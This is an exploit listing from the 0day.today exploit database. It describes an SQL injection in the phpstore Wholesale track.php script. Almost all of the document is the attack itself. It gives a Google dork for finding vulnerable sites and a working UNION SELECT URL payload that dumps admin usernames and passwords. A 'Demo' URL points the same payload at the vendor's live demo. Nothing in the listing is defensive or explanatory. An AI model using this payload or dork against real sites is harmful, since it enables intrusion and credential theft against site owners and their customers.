[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpstore Wholesale (track.php?id) SQL Injection Vulnerability

Author
Hussin X
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4187
Category
web applications
Date add
16-11-2008
Platform
unsorted
=============================================================
phpstore Wholesale (track.php?id) SQL Injection Vulnerability
=============================================================


|___________________________________________________
|
| Wholesale ( track.php id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|
|
|    Author: Hussin X
|
|___________________________________________________
|
| script :  http://www.phpstore.info/product_info.php?cPath=36_53&products_id=162
|
| DorK   : inurl:"track.php?id="
|___________________________________________________

Exploit:
________


www.[target].com/Script/track.php?id=-2+union+select+concat(username,0x3e,password)+FROM+admin--



Demo
________

http://phpstore.info/demos/wholesale/track.php?id=-2+union+select+concat(username,0x3e,password)+FROM+admin--



#  0day.today [2024-12-25]  #